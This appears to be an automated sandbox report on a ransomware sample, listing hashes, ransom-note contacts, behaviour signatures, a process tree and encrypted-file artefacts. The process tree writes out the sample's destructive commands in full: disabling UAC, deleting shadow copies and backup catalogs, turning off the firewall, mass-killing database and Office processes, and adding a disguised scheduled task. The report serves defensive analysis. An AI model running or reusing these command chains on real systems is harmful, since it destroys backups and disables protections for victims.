Analysis
-
max time kernel
131s -
max time network
48s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
04-05-2022 19:29
General
-
Target
sample.exe
-
Size
1.1MB
-
MD5
a56644a519d6fce5f20a744ae3820af2
-
SHA1
93acd978da4a602c9ea1a23b6a97d74ced436e56
-
SHA256
563daaab9f9d7be02f037c540d561c424aa3e5efc6a9a5c8d58858d98e2aae3c
-
SHA512
5ee5ae6d10bb4c3290664454666bd5f82d694bb772d9d5e6dc9e29cb7129cf696ac5b694676eb78074e4196a459e66f6b34b920017af1cd2addb35a1e1b85416
Malware Config
Extracted
C:\Read_Me!_.txt
Starmoon@my.com
starmoonio@tutanota.com
Signatures
-
UAC bypass 3 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Executes dropped EXE 2 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Modifies extensions of user files 1 IoCs
Ransomware generally changes the extension on encrypted files.
-
Deletes itself 1 IoCs
-
Drops startup file 6 IoCs
-
Loads dropped DLL 11 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Drops desktop.ini file(s) 64 IoCs
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 7 IoCs
-
Enumerates processes with tasklist 1 TTPs 9 IoCs
-
Gathers system information 1 TTPs 2 IoCs
Runs systeminfo.exe.
-
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
-
Kills process with taskkill 64 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\sample.exe"C:\Users\Admin\AppData\Local\Temp\sample.exe"1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet5⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\tasklist.exetasklist /fi "ImageName eq sample.exe" /fo csv5⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I "sample.exe"5⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 15 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\timeout.exetimeout /t 90 /nobreak5⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c echo %date%-%time%2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "os name"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "os name"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c systeminfo|find /i "original"2⤵
-
C:\Windows\SysWOW64\systeminfo.exesysteminfo3⤵
- Gathers system information
-
C:\Windows\SysWOW64\find.exefind /i "original"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com2⤵
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Modifies registry key
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im notepad.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im notepad.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Read_Me!_.txt2⤵
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Read_Me!_.txt2⤵
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Read_Me!_.txt1⤵
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Desktopini.exe"1⤵
- Executes dropped EXE
- Deletes itself
- Drops startup file
- Drops desktop.ini file(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"2⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /v /fo csv3⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\findstr.exefindstr /i "dcdcf"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /PID 112", /f2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /PID 112", /f3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ver2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c cd "%SystemDrive%\Users\%username%\AppData\"&t2_svc.bat2⤵
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\v9_svc.vbs"3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /C echo C:\Users\Admin\AppData\h4_svc.bat4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\h4_svc.bat" "4⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /v5⤵
- Enumerates processes with tasklist
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\find.exefind /I /c "dcdcf"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\%username%\AppData\t2_svc.bat'" /f2⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 6 /tn "Microsoft_Auto_Scheduler" /tr "'C:\Users\Admin\AppData\t2_svc.bat'" /f3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f&vssadmin.exe Delete Shadows /All /Quiet&wmic shadowcopy delete&netsh advfirewall set currentprofile state off&netsh firewall set opmode mode=disable&netsh advfirewall firewall set rule group="Network Discovery" new enable=Yes&wbadmin delete catalog -quiet2⤵
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet3⤵
- Interacts with shadow copies
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic shadowcopy delete3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set currentprofile state off3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall set rule group="Network Discovery" new enable=Yes3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /im msftesql.exe&taskkill /im sqlagent.exe&taskkill /im sqlbrowser.exe&taskkill /im sqlservr.exe&taskkill /im sqlwriter.exe&taskkill /im oracle.exe&taskkill /im ocssd.exe&taskkill /im dbsnmp.exe&taskkill /im synctime.exe&taskkill /im agntsvc.exe&taskkill /im mydesktopqos.exe&taskkill /im isqlplussvc.exe&taskkill /im xfssvccon.exe&taskkill /im mydesktopservice.exe&taskkill /im ocautoupds.exe&taskkill /im agntsvc.exe&taskkill /im encsvc.exe&taskkill /im firefoxconfig.exe&taskkill /im tbirdconfig.exe&taskkill /im ocomm.exe&taskkill /im mysqld.exe&taskkill /im mysqld-nt.exe&taskkill /im mysqld-opt.exe&taskkill /im dbeng50.exe&taskkill /im sqbcoreservice.exe&taskkill /im excel.exe&taskkill /im infopath.exe&taskkill /im msaccess.exe&taskkill /im mspub.exe&taskkill /im onenote.exe&taskkill /im outlook.exe&taskkill /im powerpnt.exe&taskkill /im steam.exe&taskkill /im thebat.exe&taskkill /im thebat64.exe&taskkill /im thunderbird.exe&taskkill /im visio.exe&taskkill /im winword.exe&taskkill /im wordpad.exe2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msftesql.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlagent.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlbrowser.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlservr.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqlwriter.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im oracle.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocssd.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbsnmp.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im synctime.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopqos.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im isqlplussvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im xfssvccon.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mydesktopservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocautoupds.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im agntsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im encsvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im firefoxconfig.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im tbirdconfig.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im ocomm.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-nt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mysqld-opt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im dbeng50.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im sqbcoreservice.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im excel.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im infopath.exe3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im msaccess.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mspub.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im onenote.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im outlook.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im powerpnt.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im steam.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thebat64.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im thunderbird.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im visio.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im winword.exe3⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im wordpad.exe3⤵
-
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f1⤵
- Modifies registry key
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\$Recycle.Bin\Read_Me!_.txtFilesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\$Recycle.Bin\S-1-5-21-1819626980-2277161760-1023733287-1000\Read_Me!_.txtFilesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\Read_Me!_.txtFilesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\OWOW64WW.cab[ID=3sK3OK-Mail=Starmoon@my.com].CCBGFilesize
22.8MB
MD5ca684ab780779995446dff3ded5272cf
SHA1684045a411c8cb4ed226fe128155dee41eb8d1f8
SHA256d8704d97354d84b2ef6ec6b1033a05e083145c3b84333aa20baa407f3c1d5ff7
SHA51217b2ebd3691c31593cab0afb7923dcbf1e8bc9354f146ca0cd4b8a80ceceeb14ccfa10b929cdc568bc66e832dfcc6ac197002aa74d9a337ed21cbd7e85e719a2
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.msi[ID=3sK3OK-Mail=Starmoon@my.com].CCBGFilesize
2.9MB
MD5499c3fe39287dc8c3900f14264465fc7
SHA1724619131dd0e4ab3f1badaf7f74a53cd7c26b04
SHA256c7ab4e83a1e3e0de02bc0998585c918c859292401f9a4f4fde1dcd0c6ac0338d
SHA512afab6a6bd0f89b82b20ea53784e78b5c424329c5f98dd6a3826ab526931cb8798a36fb75bace0cbe4a06ee1813f5271a7e10285eadeb261a8d9b3592b7d33d97
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Office64WW.xml[ID=3sK3OK-Mail=Starmoon@my.com].CCBGFilesize
4KB
MD5e1bf2f254f17e549d545ba5a7aa81b80
SHA1a368b571d95146189ece339ab434d21d1dfe6266
SHA2568f86115bf95dc60080392a4af38a845e6f3a0aaa6e275141ab92bd6f34cdd599
SHA512b22120a9908f8e9303f1c9a88d25389db961aa50e1a20cb3d736148c3d2602a73df6e952a55d3bef8bdd7212850b2e482edf37f1c4ffb88184a73c19f5400cac
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.msi[ID=3sK3OK-Mail=Starmoon@my.com].CCBGFilesize
23.7MB
MD5ad9d1d2ef5f214f6112930ade173de07
SHA1beb3be3dcc8e6b47c9cf2225a0fd2568d11a68c0
SHA256bff2d36d0b213b0d9fc85ec65a6439c06166b9c71ec3951bc6c46a710b34c1bd
SHA5123098742a96568048a1ef9fca62f1d5eb84a8a136e60785bb7bc691013d671ac680badb5de74452c62e61f1c3344b34e634c8c115b73922ae74b1cb6680a2fccc
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPlusWW.xml[ID=3sK3OK-Mail=Starmoon@my.com].CCBGFilesize
17KB
MD5552556a94f9200d67b05c84aa163927f
SHA1f2dab95befcb11fde699cc1f351e096a960dd48d
SHA25647ce33f061c80684a684c33da3e1971351fe9e4115e26fbc89e22aa37d106cdf
SHA51282da918c04e4e03c763d9506082cae97f39b0d9d742d883921439e9f95d9f0299665d9fa492dad02d5a5636403ff5a6e206eae99a816f71c03f4b47102bdf93d
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW.cab[ID=3sK3OK-Mail=Starmoon@my.com].CCBGFilesize
32.1MB
MD5bb18ecf9fb3fbb0f675f016291e60cdd
SHA12a7a31bfc6f8acf99e9802e978b98b88ec7c54e7
SHA256e6658daf0b1dcb13c7ba0ff3aa7237cbe75330f13c07fd21c1ddd927ca65e0b1
SHA51247dbd636ed27267e666e471148bd2b87717acf2f3188e99d9d6d283fcbbbdf1fe0dd5a49e778a8d9497bac78bc62d623773c88529e061b5a566ad39656f209cd
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ProPsWW2.cab[ID=3sK3OK-Mail=Starmoon@my.com].CCBGFilesize
34.0MB
MD5aef5bebf2150c1f57c26dd7454037dc1
SHA11b3f73d49d672e2024a27cb36bece9819608fd11
SHA256758ef1865b8794fa5efb329bfd0e8e2d8c2ba17466b6457bfc1ca82ee4e45463
SHA512b07f0cea6db802365e24ae615fe2da5fa381f7483965df9656d1910b6c5c73b4b13efce06ee7eb261d6a00e6308f77a13e583bc56da30a1e0c273cda7134c38a
-
C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\Read_Me!_.txtFilesize
1KB
MD5fc405ed23b70ee3e5cc59470f58aa78e
SHA14ad3f0f3e67dd3f183f0504d66057b32270fbecc
SHA256346faf5741bf3ac2e41a57e255ad24b6af0332a290cb2fd0e5c094d93544bd8d
SHA512622ebf37dfa41b27398e6fd275dee0f991235b473679f5eef8461359921bf862b543b5f786917e11a8d436dfcd80723d8271ae9a22d403a3a1f440b5b2a5e562
-
